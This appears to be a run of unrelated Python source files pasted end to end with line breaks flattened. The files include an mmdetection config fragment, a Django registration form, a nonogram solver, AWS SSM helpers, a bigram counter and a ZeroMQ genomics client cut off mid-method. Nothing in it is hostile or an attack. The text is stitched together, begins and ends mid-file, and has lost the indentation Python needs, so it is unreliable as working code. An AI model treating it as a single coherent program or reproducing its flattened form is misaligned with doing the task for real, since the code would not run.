size_divisor=32), dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), ] train = dict( ann_file=data_root + 'training/kitti_train_tracking.json', img_prefix=data_root, pipeline=train_pipeline) dataset = VideoCustomDataset(**train) embed() # -*- coding: utf-8 -*- """ Authors: Module: Products/GridSoils Description: This product will calculate soil properties by using the GridSoils as basis. Different soil characteristics can be estimated. The formulas are taken from the SoMoi model and the SoilGrids are taken from: ftp.soilgrids.org """ from watertools.Products.SoilGrids import K_Sat from watertools.Products.SoilGrids import Theta_FC from watertools.Products.SoilGrids import Theta_Sat from watertools.Products.SoilGrids import Theta_Sat2 from watertools.Products.SoilGrids import Theta_Res from watertools.Products.SoilGrids import Water_Holding_Capacity from watertools.Products.SoilGrids import n_van_genuchten __all__ = ['K_Sat', 'Theta_FC', 'Theta_Sat', 'Theta_Sat2', 'Theta_Res', 'Water_Holding_Capacity', 'n_van_genuchten'] __version__ = '0.1' sysinv/cgts-client/cgts-client/cgtsclient/v1/interface_datanetwork.py1-10 # # Copyright (c) 2019 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # # -*- encoding: utf-8 -*- # from cgtsclient.common import base from cgtsclient import exc CREATION_ATTRIBUTES = [ 'interface_uuid', 'datanetwork_uuid' ] class InterfaceDataNetwork(base.Resource): def __repr__(self): return "" % self._info class InterfaceDataNetworkManager(base.Manager): resource_class = InterfaceDataNetwork def list(self): path = '/v1/interface_datanetworks' return self._list(path, "interface_datanetworks") def list_by_host(self, host_uuid): path = '/v1/ihosts/%s/interface_datanetworks' % host_uuid return self._list(path, "interface_datanetworks") def list_by_interface(self, interface_uuid): path = '/v1/iinterfaces/%s/interface_datanetworks' % interface_uuid return self._list(path, "interface_datanetworks") def get(self, interface_datanetwork_uuid): path = '/v1/interface_datanetworks/%s' % interface_datanetwork_uuid try: return self._list(path)[0] except IndexError: return None def assign(self, **kwargs): path = '/v1/interface_datanetworks' new = {} for (key, value) in kwargs.items(): if key in CREATION_ATTRIBUTES: new[key] = value else: raise exc.InvalidAttribute('%s' % key) return self._create(path, new) def remove(self, interface_datanetwork_uuid): path = '/v1/interface_datanetworks/%s' % interface_datanetwork_uuid return self._delete(path) def get_datanetwork_names(cc, interface): datanetwork_names = [] ifdns = cc.interface_datanetwork.list_by_interface(interface.uuid) for ifdn in ifdns: datanetwork_names.append(getattr(ifdn, 'datanetwork_name')) return datanetwork_names src/expensetracker/run.py from aiohttp import web routes = web.RouteTableDef() @routes.get("/") async def handle(request): name = request.match_info.get("name", "Anonymous") text = f"Hello {name}" return web.Response(text=text) app = web.Application() app.add_routes(routes) if __name__ == "__main__": web.run_app(app) from PyObjCTools.TestSupport import * from AppKit import * try: unicode except NameError: unicode = str class TestNSOutlineViewHelper (NSObject): def outlineView_sizeToFitWidthOfColumn_(self, v, c): return 1 def outlineView_shouldReorderColumn_toColumn_(self, v, c1, c2): return 1 def outlineView_shouldShowOutlineCellForItem_(self, v, i): return 1 def outlineView_child_ofItem_(self, ov, nr, item): return 1 def outlineView_isItemExpandable_(self, ov, item): return 1 def outlineView_numberOfChildrenOfItem_(self, ov, item): return 1 def outlineView_objectValueForTableColumn_byItem_(self, ov, tc, item): return 1 def outlineView_setObjectValue_forTableColumn_byItem_(self, ov, value, tc, item): pass def outlineView_itemForPersistentObject_(self, ov, po): return 1 def outlineView_persistentObjectForItem_(self, ov, item): return 1 def outlineView_sortDescriptorsDidChange_(self, ov, old): pass def outlineView_writeItems_toPasteboard_(self, ov, items, pb): return 1 def outlineView_validateDrop_proposedItem_proposedChildIndex_(self, ov, dr, item, idx): return 1 def outlineView_acceptDrop_item_childIndex_(self, ov, dr, it, idx): return 1 def outlineView_namesOfPromisedFilesDroppedAtDestination_forDraggedItems_(self, ov, dr, it): return 1 def outlineView_willDisplayCell_forTableColumn_item_(self, ov, c, tc, i): pass def outlineView_shouldEditTableColumn_item_(self, ov, tc, i): return 1 def selectionShouldChangeInOutlineView_(self, ov): return 1 def outlineView_selectionIndexesForProposedSelection_(self, ov, idx): return 1 def outlineView_shouldSelectItem_(self, ov, tc): return 1 def outlineView_shouldSelectTableColumn_(self, ov, tc): return 1 def outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_(self, ov, c, r, tc, it, ml): return 1 def outlineView_heightOfRowByItem_(self, ov, item): return 1 def outlineView_typeSelectStringForTableColumn_item_(self, ov, tc, item): return 1 def outlineView_nextTypeSelectMatchFromItem_toItem_forString_(self, ov, si, ei, ss): return 1 def outlineView_shouldTypeSelectForEvent_withCurrentSearchString_(self, ov, ev, ss): return 1 def outlineView_shouldShowCellExpansionForTableColumn_item_(self, ov, tc, it): return 1 def outlineView_shouldTrackCell_forTableColumn_item_(self, ov, c, tc, it): return 1 def outlineView_dataCellForTableColumn_item_(self, ov, tc, it): return 1 def outlineView_isGroupItem_(self, ov, item): return 1 def outlineView_shouldExpandItem_(self, ov, it): return 1 def outlineView_shouldCollapseItem_(self, ov, it): return 1 def outlineView_willDisplayOutlineCell_forTableColumn_item_(self, ov, c, tc, i): pass def outlineView_draggingSession_willBeginAtPoint_(self, a, b, c): pass def outlineView_draggingSession_endedAtPoint_(self, a, b, c): pass class TestNSOutlineView (TestCase): def testConstants(self): self.assertEqual(NSOutlineViewDropOnItemIndex, -1) self.assertIsInstance(NSOutlineViewSelectionDidChangeNotification, unicode) self.assertIsInstance(NSOutlineViewColumnDidMoveNotification, unicode) self.assertIsInstance(NSOutlineViewColumnDidResizeNotification, unicode) self.assertIsInstance(NSOutlineViewSelectionIsChangingNotification, unicode) self.assertIsInstance(NSOutlineViewItemWillExpandNotification, unicode) self.assertIsInstance(NSOutlineViewItemDidExpandNotification, unicode) self.assertIsInstance(NSOutlineViewItemWillCollapseNotification, unicode) self.assertIsInstance(NSOutlineViewItemDidCollapseNotification, unicode) def testMethods(self): self.assertResultIsBOOL(NSOutlineView.isExpandable_) self.assertArgIsBOOL(NSOutlineView.expandItem_expandChildren_, 1) self.assertArgIsBOOL(NSOutlineView.collapseItem_collapseChildren_, 1) self.assertArgIsBOOL(NSOutlineView.reloadItem_reloadChildren_, 1) self.assertResultIsBOOL(NSOutlineView.isItemExpanded_) self.assertResultIsBOOL(NSOutlineView.indentationMarkerFollowsCell) self.assertArgIsBOOL(NSOutlineView.setIndentationMarkerFollowsCell_, 0) self.assertResultIsBOOL(NSOutlineView.autoresizesOutlineColumn) self.assertArgIsBOOL(NSOutlineView.setAutoresizesOutlineColumn_, 0) self.assertResultIsBOOL(NSOutlineView.shouldCollapseAutoExpandedItemsForDeposited_) self.assertArgIsBOOL(NSOutlineView.shouldCollapseAutoExpandedItemsForDeposited_, 0) self.assertResultIsBOOL(NSOutlineView.autosaveExpandedItems) self.assertArgIsBOOL(NSOutlineView.setAutosaveExpandedItems_, 0) def testProtocols(self): self.assertArgHasType(TestNSOutlineViewHelper.outlineView_child_ofItem_, 1, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_isItemExpandable_) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_numberOfChildrenOfItem_, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_writeItems_toPasteboard_) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_validateDrop_proposedItem_proposedChildIndex_, objc._C_NSUInteger) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_validateDrop_proposedItem_proposedChildIndex_, 3, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldEditTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.selectionShouldChangeInOutlineView_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldSelectItem_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldSelectTableColumn_) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_, 2, b'N^' + NSRect.__typestr__) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_, 5, NSPoint.__typestr__) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_heightOfRowByItem_, objc._C_CGFloat) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldExpandItem_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldCollapseItem_) @min_os_level('10.5') def testProtocols10_5(self): self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldTypeSelectForEvent_withCurrentSearchString_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldShowCellExpansionForTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldTrackCell_forTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_isGroupItem_) @min_os_level('10.6') def testProtocols10_6(self): self.assertResultHasType(TestNSOutlineViewHelper.outlineView_sizeToFitWidthOfColumn_, objc._C_CGFloat) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_sizeToFitWidthOfColumn_, 1, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_, 1, objc._C_NSInteger) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_, 2, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldShowOutlineCellForItem_) @min_os_level('10.7') def testProtocols10_7(self): self.assertArgHasType(TestNSOutlineViewHelper.outlineView_draggingSession_willBeginAtPoint_, 2, NSPoint.__typestr__) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_draggingSession_endedAtPoint_, 2, NSPoint.__typestr__) if __name__ == "__main__": main() from django import forms from apps.users.models import InterestedParty from registration.forms import RegistrationFormUniqueEmail from django.contrib.auth.forms import AuthenticationForm from django.contrib.auth import authenticate from django.contrib.auth.models import User import pytz zones = pytz.common_timezones zones = [z for z in zones if z.startswith('US')] + [z for z in zones if not z.startswith('US')] class UsernameOrEmailAuthenticationForm(AuthenticationForm): username = forms.CharField(max_length=512) def clean(self): try: result = super(UsernameOrEmailAuthenticationForm, self).clean() return result except forms.ValidationError as ve: username = self.cleaned_data.get('username') password = self.cleaned_data.get('password') # Try username as email address try: user = User.objects.get(email=username) email_username = user.username self.user_cache = authenticate(username=email_username, password=password) if self.user_cache is None: raise ve except: raise ve class UserRegistrationForm(RegistrationFormUniqueEmail): first_name = forms.CharField(max_length=512) last_name = forms.CharField(max_length=512) #organization = forms.CharField(max_length=255, required=False) journalist = forms.BooleanField(required=False) timezone = forms.ChoiceField(choices=[(x, x) for x in zones]) mailing_address = forms.CharField(max_length=150, required=False) mailing_city = forms.CharField(max_length=50, required=False) mailing_state = forms.CharField(max_length=20, required=False) mailing_zip = forms.CharField(max_length=20, required=False) phone = forms.CharField(max_length=20, required=False) class InterestedPartyForm(forms.ModelForm): class Meta: model = InterestedParty exclude = ('activation_key', 'activated_on', 'followed_request',) from abc import ABC, abstractmethod import pytest from pycats import typeclass, instance def test_typeclass(): @typeclass class Foo(ABC): @abstractmethod def foo_fn(self): pass with pytest.raises(TypeError, match="typeclass"): Foo() with pytest.raises(TypeError, match="should inherit"): @typeclass class Foo: @abstractmethod def foo_fn(self): pass def test_instance(): @typeclass class Foo(ABC): @abstractmethod def foo_fn(self): pass @typeclass class Bar(Foo, ABC): @abstractmethod def bar_fn(self): pass def give_one(self): return 1 @instance(Foo, int) class IntFoo: def foo_fn(self): return self + 1 @instance(Bar, int) class IntBar: def bar_fn(self): return self * 2 actual = (1).foo_fn() expected = 2 assert actual == expected actual = (2).bar_fn() expected = 4 assert actual == expected actual = (3).give_one() expected = 1 assert actual == expected with pytest.raises(TypeError, match="typeclass instance"): IntBar() with pytest.raises(TypeError, match="missing implementations"): @instance(Foo, str) class StrFoo: pass class Obj: def __init__(self, value): self.value = value @instance(Foo, Obj) class ObjFoo: def foo_fn(self): return self.value + 4 actual = Obj(3).foo_fn() expected = 7 assert actual == expected jokteur/hpx-dashboard # -*- coding: utf-8 -*- # # HPX - dashboard # # Copyright (c) 2020 - ETH Zurich # All rights reserved # # SPDX-License-Identifier: BSD-3-Clause """Module for integration into Jupyter notebooks""" from queue import Queue import threading import time from bokeh.plotting import output_notebook, show from ..common.logger import Logger from .data import DataAggregator from .tcp_listener import TCP_Server, handle_response from .components import scheduler_doc, tasks_doc, custom_counter_doc from .worker import worker_thread, WorkerQueue from ..common.constants import task_cmap def start(port=5267, auto_save=True, save_path="", import_path=""): """Starts the TCP server for incoming data and the bokeh ioloop. Can only be called once in a session. Arguments --------- port : int port on which the TCP client listens for incoming data auto_save : bool if True, the session will be automatically saved at save_path. A directory is created for each session `hpx_data.`. save_path : str path where the session will be saved. Is only used if auto_save==True import_path : str imports a previous session into the new session. Any new data coming to this session will be saved in the imported session. """ DataAggregator(auto_save=auto_save, save_path=save_path, import_path=import_path) tcp_queue = Queue() tcp_server = TCP_Server(queue=tcp_queue) tcp_server.listen(port) tcp_thread = threading.Thread(target=lambda: handle_response(tcp_queue)) tcp_thread.daemon = True tcp_thread.start() work_queue = WorkerQueue() work_thread = threading.Thread(target=lambda: worker_thread(work_queue)) work_thread.daemon = True work_thread.start() output_notebook() Logger().info(f"Server has started and is listening on port {port}") def scheduler(): """Shows the scheduler plot in a notebook.""" show(lambda doc: scheduler_doc({}, doc)) def tasks(cmap=task_cmap): """Shows the task plot in a notebook. Arguments --------- cmap : list, colormap, str colormap for the task plot. Usefull if you want to import your own task data into the DataAggregator and change the colors. Otherwise, if you just want to redefine the colormap of the task plot, the length should be 256 if given as a list. """ show(lambda doc: tasks_doc({"cmap": cmap}, doc)) def custom_counter(): """Shows the custom counter plot widget in a notebook.""" show(lambda doc: custom_counter_doc({}, doc)) def import_tasks_from_df(df, color_hash_dict=None): """Imports task data into a new collection in the DataAggregator. Arguments --------- df : pd.DataFrame dataframe that should have the columns `name`, `locality`, `worker_id`, `start` and `end` color_hash_dict : dict color lookup for the task names (used later for the cmap in the task plot). Lookup should point to floating numbers. """ DataAggregator().new_collection(time.time()) new_collection = DataAggregator().get_live_collection() new_collection.import_task_data(df, color_hash_dict) new_collection = DataAggregator().finalize_current_collection(time.time()) 10-100 from typing import Optional from yangify.translator import Translator, TranslatorData, unneeded class VlanConfigVlans(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan/config/vlans" def pre_process_list(self) -> None: if self.to_remove: for element in self.to_remove: self.result.add_command(f"no vlan {element['vlan-id']}") def pre_process(self) -> None: if self.replace: self.root_result.add_command(f"no vlan {self.key}") self.result = self.root_result.new_section(f"vlan {self.key}") def post_process(self) -> None: if self.result: self.result.add_command(" exit\n!") else: self.root_result.pop_section(f"vlan {self.key}") vlan_id = unneeded def name(self, value: Optional[str]) -> None: if value: self.yy.result.add_command(f" name {value}") else: self.yy.result.add_command(f" no name") def active(self, value: Optional[str]) -> None: if value: self.yy.result.add_command(f" no shutdown") else: self.yy.result.add_command(f" shutdown") class VlanConfig(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan/config" vlans = VlanConfigVlans class Vlan(Translator): class Yangify(TranslatorData): path = "/ntc-vlan:vlan" config = VlanConfig from spacy.lang.fr import French nlp = French() doc = nlp("J'ai un chat") # Recherche le hash pour le mot "chat" cat_hash = ____.____.____[____] print(cat_hash) # Recherche cat_hash pour obtenir la chaine cat_string = ____.____.____[____] print(cat_string) codesmith-gmbh/forge import json from codesmith.common import cfn def put_string_parameter(ssm, parameter_name, *, value, description): try: return ssm.put_parameter( Name=parameter_name, Description=description, Value=value, Overwrite=True, Type='String', Tier='Standard' ) except ssm.exceptions.ClientError as e: raise RuntimeError(f'Cannot put parameter with name {parameter_name}') from e def fetch_string_parameter(ssm, parameter_name): parameter = ssm.get_parameter( Name=parameter_name, WithDecryption=True ) return parameter['Parameter']['Value'] def put_json_parameter(ssm, parameter_name, *, value, description): return put_string_parameter(ssm, parameter_name, value=json.dumps(value), description=description) def fetch_json_parameter(ssm, parameter_name): return json.loads(fetch_string_parameter(ssm, parameter_name)) def silent_delete_parameter(ssm, parameter_name): try: ssm.delete_parameter(Name=parameter_name) except ssm.exceptions.ParameterNotFound: pass except ssm.exceptions.ClientError: pass return parameter_name def silent_delete_parameter_from_event(ssm, event): parameter_name = cfn.physical_resource_id(event) return silent_delete_parameter(ssm, parameter_name) #!/usr/bin/env python3 """ [Nonogram](https://en.wikipedia.org/wiki/Nonogram) solver. The input is a list of strings: * The first line contains width and height of the board, separated by the space character. * The next width of lines contain space-separated hints for the vertical lines. * The next height of lines contain space-separated hints for the horizontal lines. * (optional) The next height of lines contains a drawing of the semi-solved board, if one wants to start from a starting semi-solution. The characters used are defined in the class below and are, by default, as follows: * empty tile: `.`, * unknown tile: ` `, * occupied tile: `@`. """ import itertools import re import sys import time class NonogramNoSolutionError(Exception): """ Raised when trying to solve Nonogram with no solutions. """ class NonogramSolver: """ [Nonogram](https://en.wikipedia.org/wiki/Nonogram) solver. """ TILE_EMPTY = "." TILE_UNKNOWN = " " TILE_OCCUPIED = "@" def __init__(self, definition): try: self.width, self.height = self._line2list(definition[0]) except (IndexError, TypeError, ValueError): raise ValueError( "the first line of the definition must contain only width and" " height as two ints separated by one or more spaces", ) if len(definition) == self.width + self.height + 1: self.board = [ [self.TILE_UNKNOWN] * self.width for _ in range(self.height) ] elif len(definition) == self.width + 2 * self.height + 1: f = self.width + self.height + 1 t = self.width + 2 * self.height + 1 self.board = self._get_board(definition[f:t]) else: raise ValueError( "definition must contain width + height + 1 or" " width + 2 * height + 1 lines", ) self.vertical = [ self._line2list(line) for line in definition[1:self.width + 1] ] self.horizontal = [ self._line2list(line) for line in definition[self.width + 1:self.width + self.height + 1] ] if self._sum_hints(self.vertical) != self._sum_hints(self.horizontal): raise ValueError( "the sums of vertical and horizontal hints must match", ) self.iterations = None self.time = None @staticmethod def _line2list(line): """ Return a list of numbers from a space-separated string of numbers. """ return [int(v) for v in line.strip().split()] @staticmethod def _sum_hints(hints): """ Return a sum of all elements of a list of lists of `int` values. """ return sum(sum(line) for line in hints) @classmethod def from_file(cls, fname): """ Create an instance of `NonogramSolver` and populate it from a file. """ with open(fname) as f: return cls(list(f)) def _get_board(self, lines): """ Return a board (a list of lists of tiles) from given list of strings. """ if len(lines) != self.height: raise ValueError("invalid number of lines in the board") lines = [line.rstrip("\n") for line in lines] try: invalid_line_idx = next( idx for idx, line in enumerate(lines) if len(line) > self.width ) except StopIteration: pass else: raise ValueError( f"invalid number of columns in board's line" f" {invalid_line_idx + 1}", ) return [ list(line) + [self.TILE_UNKNOWN] * (self.width - len(line)) for line in lines ] def print_board(self): """ Print the current state of the board to standard output. """ for line_idx, line in enumerate(self.board): if line_idx and line_idx % 5 == 0: print() print(re.sub(r".{5}", r"\g<0> ", "".join(line))[:-1]) @classmethod def _get_hint(cls, line): """ Return a line of the board as a list of `int` values containing hints. """ result = list() is_occupied = False for tile in line: if tile == cls.TILE_OCCUPIED: if is_occupied: result[-1] += 1 else: is_occupied = True result.append(1) else: is_occupied = False return result @classmethod def _solve_line(cls, line, hints): """ Solve one line as much as possible. The algorithm tries all possible solution candidates that conform with `hints`. Those tiles that get the same value (empty or occupied) for all of the solution candidates are considered a part of the solution. The `line` is then updated with these elements. If no new elements are found, the method returns `None`. """ line_try = list(line) occupied_cnt = sum(1 for tile in line if tile == cls.TILE_OCCUPIED) hints_cnt = sum(hints) if hints_cnt == occupied_cnt: return None tries = { idx: (cls.TILE_EMPTY, cls.TILE_OCCUPIED) for idx, tile in enumerate(line) if tile == cls.TILE_UNKNOWN } intersection = None for one_try in itertools.product(*tries.values()): new_cnt = sum(1 for tile in one_try if tile == cls.TILE_OCCUPIED) if occupied_cnt + new_cnt != hints_cnt: continue for idx, tile in zip(tries.keys(), one_try): line_try[idx] = tile if cls._get_hint(line_try) == hints: if intersection is None: intersection = one_try else: intersection = tuple( i_tile if i_tile == t_tile else cls.TILE_UNKNOWN for i_tile, t_tile in zip(intersection, one_try) ) if intersection is None: return None if all(tile == cls.TILE_UNKNOWN for tile in intersection): return None else: for idx, tile in zip(tries.keys(), intersection): line_try[idx] = tile return line_try @classmethod def _line_is_solved(cls, line, hints): """ Return `True` if the line's number of occupied tiles matches `hints`. *Note:* This method assumes that the tiles don't contradict `hints` and only compares the total number of occupied tiles. The reason for this is simplicity because it is used on (semi-)solved lines which are already guaranteed not to contradict `hints`. """ total_occupied = sum(1 for tile in line if tile == cls.TILE_OCCUPIED) return total_occupied == sum(hints) @classmethod def _fill_done_line(cls, line): """ Replace all of the unknown tiles in the line with empty ones. """ line[:] = [ cls.TILE_EMPTY if tile == cls.TILE_UNKNOWN else tile for tile in line ] def _try_horizontal_lines(self, board, done_h): """ Try solving all horizontal lines (each of them once). """ result = False for idx, (line, hints) in enumerate(zip(board, self.horizontal)): if idx in done_h: continue line_try = self._solve_line(line, hints) if line_try is not None: line[:] = line_try result = True if self._line_is_solved(line, hints): self._fill_done_line(line) done_h.add(idx) return result def _fill_finished_vertical_lines(self, board, done_v): """ Replace unknown tiles with empty ones in all finished vertical lines. """ for idx, hints in enumerate(self.vertical): if idx in done_v: continue column = [line[idx] for line in board] if self._line_is_solved(column, hints): self._fill_done_line(column) for line, c_tile in zip(board, column): line[idx] = c_tile done_v.add(idx) def _try_vertical_lines(self, board, done_v): """ Try solving all vertical lines (each of them once). """ result = False for idx, hints in enumerate(self.vertical): if idx in done_v: continue column = [line[idx] for line in board] line_try = self._solve_line(column, hints) if line_try is not None: if self._line_is_solved(line_try, hints): self._fill_done_line(line_try) done_v.add(idx) for line, lt_tile in zip(board, line_try): line[idx] = lt_tile result = True return result def _fill_finished_horizontal_lines(self, board, done_h): """ Replace unknown tiles with empty ones in all finished horizontal lines. """ for idx, (line, hints) in enumerate(zip(board, self.horizontal)): if self._line_is_solved(line, hints): self._fill_done_line(line) done_h.add(idx) def solve(self): """ Solve the current board as much as possible. """ board = self.board done_h = set() done_v = set() start_time = time.time() for iteration in range(self.width * self.height): got_something_horz = self._try_horizontal_lines(board, done_h) if got_something_horz: self._fill_finished_vertical_lines(board, done_v) got_something_vert = self._try_vertical_lines(board, done_v) if got_something_vert: self._fill_finished_horizontal_lines(board, done_h) if not (got_something_horz or got_something_vert): break end_time = time.time() self.time = end_time - start_time self.iterations = iteration + 1 if __name__ == "__main__": try: solver = NonogramSolver.from_file(sys.argv[1]) except IndexError: print(f"Syntax: {sys.argv[0]} filename") sys.exit(1) solver.solve() solver.print_board() print( f"Solved in {solver.time:.3f}s, using {solver.iterations} iterations.", ) from setuptools import setup with open("README.rst") as f: long_description = f.read() setup( name="django-templatetag-sugar", version=__import__("templatetag_sugar").__version__, author="", author_email="", description="A library to make Django's template tags sweet.", long_description=long_description, license="BSD", url="http://github.com/alex/django-templatetag-sugar/", packages=[ "templatetag_sugar", ], classifiers=[ "Environment :: Web Environment", "Intended Audience :: Developers", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Framework :: Django", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.2", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", ] ) import pypinyin import sys from tqdm import tqdm import json chars = set() with open('../data/char.txt', 'r', encoding='utf8', errors='ignore') as f: for c in f.readlines()[0]: chars.add(c) # print(chars[:5]) print(len(chars)) def bi_freq(): bi_freq_dic = dict() with open('../data/corpus.txt', 'r') as f: for line in tqdm(f.readlines()): for headpos in range(len(line) - 1): if (line[headpos] in chars) and (line[headpos + 1] in chars): if (line[headpos] + line[headpos + 1]) in bi_freq_dic: bi_freq_dic[line[headpos] + line[headpos + 1]] += 1 else: bi_freq_dic[line[headpos] + line[headpos + 1]] = 1 cnt_all_bi_chars = 0 for freq in bi_freq_dic.values(): cnt_all_bi_chars += freq for k in bi_freq_dic.keys(): bi_freq_dic[k] /= cnt_all_bi_chars return bi_freq_dic ''' bi_freq_dic = bi_freq() with open('../data/bi_freq_dic.json', 'w') as f: json.dump(bi_freq_dic, f) sys.exit(0) ''' with open('../data/bi_freq_dic.json', 'r') as f: bi_freq_dic = json.load(f) def triple_trans(): trans = dict() # build 2-words set bichars_dic = set() for char2 in bi_freq_dic.keys(): bichars_dic.add(char2) trans[char2] = dict() # trans[char2]['bifreq'] = bi_freq_dic[char2] with open('../data/corpus.txt', 'r') as f: for line in tqdm(f.readlines()): for index in range(len(line) - 2): two_chars = line[index] + line[index + 1] if (two_chars not in bichars_dic) or (line[index + 2] not in chars): continue if line[index + 2] not in trans[two_chars]: trans[two_chars][line[index + 2]] = 1 else: trans[two_chars][line[index + 2]] = 1 for subdickey in trans.keys(): tot = 0 for freq in trans[subdickey].values(): tot += freq if tot == 0: continue for k in trans[subdickey].keys(): trans[subdickey][k] /= tot return trans trip_dic = triple_trans() with open('../data/trip_dic.json', 'w', encoding='utf-8') as f: json.dump(trip_dic, f) # print(trans_dic['我']['爱']) import zmq, json import pandas as pd from ipyTrenaViz import * import time, os class Trena: def __init__(self, genomeName): socketContext = zmq.Context(); self.trenaServer = socketContext.socket(zmq.REQ) self.trenaServer.connect("tcp://trena:%s" % "5548") self.tv = ipyTrenaViz() display(self.tv) self.tv.setGenome(genomeName) def version(self): return(1.02) def display(self): display(self.tv) def ping(self): print("sending ping to treanServer") msg = {'cmd': 'ping', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) return(response) def showGenomicRegion(self, regionString): self.tv.showGenomicRegion(regionString); def getGenomicRegion(self): return(self.tv.getBrowserState()["chromLocString"]); def dataFrameFrom3partList(self, list): data = list['tbl'] rownames = list['rownames'] colnames = list['colnames'] df = pd.DataFrame(data) df.columns = colnames rownameList = {} for i in range(len(rownames)): rownameList[i] = rownames[i] df = df.rename(rownameList) return(df) def getModelNames(self): msg = {'cmd': 'getModelNames', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def getModel(self, name): msg = {'cmd': 'getModel', 'status': 'request', 'callback': '', 'payload': name} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] return(tbl) def getVariants(self, minScore, display, color, trackHeight=50): msg = {'cmd': 'getVariants', 'status': 'request', 'callback': '', 'payload': {'minScore': minScore}} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(tbl, "variants >= %4.2f" % minScore, "SQUISHED", color, trackHeight) return(tbl) def getExpressionMatrixNames(self): msg = {'cmd': 'getExpressionMatrixNames', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def summarizeExpressionMatrices(self): msg = {'cmd': 'summarizeExpressionMatrices', 'status': 'request', 'callback': '', 'payload': ''} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(self.dataFrameFrom3partList(payload)) def getFootprintsInRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getFootprintsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "footprints", "SQUISHED", "blue") return(regTbl) def getDHSinRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getDHSRegionsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "DHS", "SQUISHED", "darkreen") return(regTbl) def getDHSMotifsinRegion(self, display): payload = {"roi": self.getGenomicRegion()} msg = {'cmd': 'getDHSMotifsInRegion', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] regTbl = self.dataFrameFrom3partList(tblAsList) regTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(regTbl, "DHS motifs", "SQUISHED", "magenta") return(regTbl) def findVariantsInModel(self, modelName, shoulder, display): payload = {"modelName": modelName, "shoulder": shoulder}; msg = {'cmd': 'findVariantsInModel', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] varTbl = self.dataFrameFrom3partList(tblAsList) varTbl.key = payload["key"] if(display): self.tv.addBedTrackFromDataFrame(varTbl.loc[:, ['chrom', 'pos', 'pos', 'rsid']], "voi", "SQUISHED", "darkred") return(varTbl) def displayFootprints(self, url): self.tv.addBedTrackFromDataFrame(url) def addBedTrackFromDataFrame(self, tbl, 